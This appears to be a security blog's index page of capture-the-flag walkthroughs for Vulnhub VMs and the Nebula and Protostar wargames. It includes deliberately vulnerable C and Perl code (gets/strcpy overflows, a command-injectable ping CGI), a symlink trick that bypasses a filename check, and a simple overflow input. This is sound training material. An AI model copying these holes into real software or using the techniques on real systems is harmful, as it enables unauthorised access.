Thursday, October 5, 2017

RickdiculouslyEasy: 1 - Walkthrough

It has been a long time since I've last posted anything off of Vulnhub. To be honest, I just haven't had too much time to dive into any of these VM's. However, g0tmi1k released a ton of new VM's so I wanted to check them out. One of which is was RickdiculouslyEasy: 1 made by Luke.

This VM is based off the tv show Rick and Morty. I, myself, am a fan of this show so I had to check it out. It turned out to be quite easy but I still had fun solving it. Below is my walkthrough on capturing all of the flags. 


Friday, June 30, 2017

Elevate from Admin to NT Authority\SYSTEM

Elevate from Admin to NT Authority\SYSTEM


The other day I gained Administrative access to a windows machine. While I was enumerating around, I had the urge to escalate to the most powerful account on a Windows local instance: NT Authority\SYSTEM.

I realized there weren't a lot of posts online about it. I figured I'd give the steps I did in order to accomplish this task.



Wednesday, May 3, 2017

64Base - Walkthrough




It's been a while since I've been able to work on a vulnhub image. I started looking at recent releases and came across 64base. This VM has a Star Wars theme which is always great. Plus, it was 3mrgnc3's first public VM so I had to check it out!



Monday, April 10, 2017

Protostar - stack4

This is my fifth post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


About

Stack4 takes a look at overwriting saved EIP and standard buffer overflows.
This level is at /opt/protostar/bin/stack4
Hints
  • A variety of introductory papers into buffer overflows may help.
  • gdb lets you do “run < input”
  • EIP is not directly after the end of buffer, compiler padding can also increase the size.

Source code



#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}


Nebula - level08

This is my ninth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

World readable files strike again. Check what that user was up to, and use it to log into flag08 account.
To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08.

Source code

There is no source code available for this level


Thursday, March 9, 2017

Protostar - stack3

This is my fourth post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

Stack3 looks at environment variables, and how they can be set, and overwriting function pointers stored on the stack (as a prelude to overwriting the saved EIP)
Hints
  • both gdb and objdump is your friend you determining where the win() function lies in memory.
This level is at /opt/protostar/bin/stack3

Source code



#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}


Tuesday, March 7, 2017

Nebula - level07

This is my eighth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.
To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.

Source code

#!/usr/bin/perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub ping {
  $host = $_[0];

  print("<html><head><title>Ping results</title></head><body><pre>");

  @output = `ping -c 3 $host 2>&1`;
  foreach $line (@output) { print "$line"; }

  print("</pre></body></html>");
  
}

# check if Host set. if not, display normal page, etc

ping(param("Host"));

Protostar - stack2

This is my third post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

Stack2 looks at environment variables, and how they can be set.
This level is at /opt/protostar/bin/stack2

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}

Saturday, March 4, 2017

Nebula - level06

This is my seventh post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

The flag06 account credentials came from a legacy unix system.
To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.

Source code

There is no source code available for this level


Nebula - level05

This is my sixth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

Check the flag05 home directory. You are looking for weak directory permissions
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.

Source code

There is no source code available for this level


Wednesday, March 1, 2017

Protostar - stack1

This is my second post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:



Nebula - level04

This is my fifth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)

To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.


Source code

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>

int main(int argc, char **argv, char **envp)
{
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
      printf("%s [file to read]\n", argv[0]);
      exit(EXIT_FAILURE);
  }

  if(strstr(argv[1], "token") != NULL) {
      printf("You may not access '%s'\n", argv[1]);
      exit(EXIT_FAILURE);
  }

  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
      err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  rc = read(fd, buf, sizeof(buf));
  
  if(rc == -1) {
      err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
}

We read our code above. There are arguments that state if we give the appropriate argument, we will read the file. If it's token but we don't ave access, we fail. If it's a file we cannot read, we fail. If we break the buffer, we fail.

So, it looks like we need proper privileges to read the token file.

With our information in hand, we SSH into the host:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
level04@nebula:/home/flag04$ ls -lah
total 13K
drwxr-x--- 2 flag04 level04   93 2011-11-20 21:52 .
drwxr-xr-x 1 root   root      60 2012-08-27 07:18 ..
-rw-r--r-- 1 flag04 flag04   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag04 flag04  3.3K 2011-05-18 02:54 .bashrc
-rwsr-x--- 1 flag04 level04 7.3K 2011-11-20 21:52 flag04
-rw-r--r-- 1 flag04 flag04   675 2011-05-18 02:54 .profile
-rw------- 1 flag04 flag04    37 2011-11-20 21:52 token
level04@nebula:/home/flag04$ 

Per usual, we see the flag04 file is has SUID and is owned by flag04 and allows level04 (us) to run it.

We run the file to get a feel with what we're working with:

level04@nebula:/home/flag04$ ./flag04 
./flag04 [file to read]
level04@nebula:/home/flag04$

As expected, we need a file to read.

After tinkering around and realizing that the code allows us to execute, we just need to create a symbolic link on a file that "we" own and have the program call that file.

Let's do this:

level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/level04
level04@nebula:/home/flag04$ ls -lah /tmp/level04
lrwxrwxrwx 1 level04 level04 18 2017-03-01 17:37 /tmp/level04 -> /home/flag04/token
level04@nebula:/home/flag04$ 

We create a symbolic link to /tmp/level04 to /home/flag04/token. We verify with ls -lah.

We then test our theory and execute:


level04@nebula:/home/flag04$ ./flag04 /tmp/level04
06508b5e-8909-4f38-b630-fdb148a848a2
level04@nebula:/home/flag04$ 

Excellent! We receive our token from /home/flag04/token.

Thanks for reading!

-geoda





Monday, February 27, 2017

Protostar - stack0

This is my first post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


To begin, I run the program to see what's going on:

$ ./stack0

Try again?
$ ./stack0
HI
Try again?
$ 

Okay. Looks like that wasn't what we wanted.

Based off the code, we want to have the program print "you have changed the 'modified' variable". To do this, we need to crash the program.

We have 64 bytes of buffer allocated. If we can send more than 64 bytes, we will change the modified variable from 0 to not 0.

Let's give this a whirl:


$ python -c 'print "A" * 64' | ./stack0
Try again?
$ python -c 'print "A" * 65' | ./stack0
you have changed the 'modified' variable
$ 

Excellent!

Our next attempt will be on stack1.

Thanks for reading!

-geoda





Sunday, February 26, 2017

Nebula - level03

This is my fourth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:



Saturday, February 25, 2017

Nebula - level02

This is my third post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


Nebula - level01

This is the second post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


Nebula - level00

This is my first post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


Lord of the R00t: Walkthrough

Below is my walkthrough for a VM posted on Vulnhub by KookSec called Lord Of The Root back in 2015.



Sunday, February 12, 2017

Pegasus: 1 - Walkthrough


This vulnhub image is called "Pegasus: 1" and it was created by Knapsy.



I found this VM had the perfect balance of remote and local exploitation. There were definitely times during this where I was slamming my head on the desk confused at what I was doing wrong. Other times, I knew exactly what I needed to do, I just didn't know how to actually accomplish the task. This really brought me back to my OSCP days and the infamous "Try Harder". Like anything, if you don't know how to achieve something, spend time researching and learning; it will eventually pay off!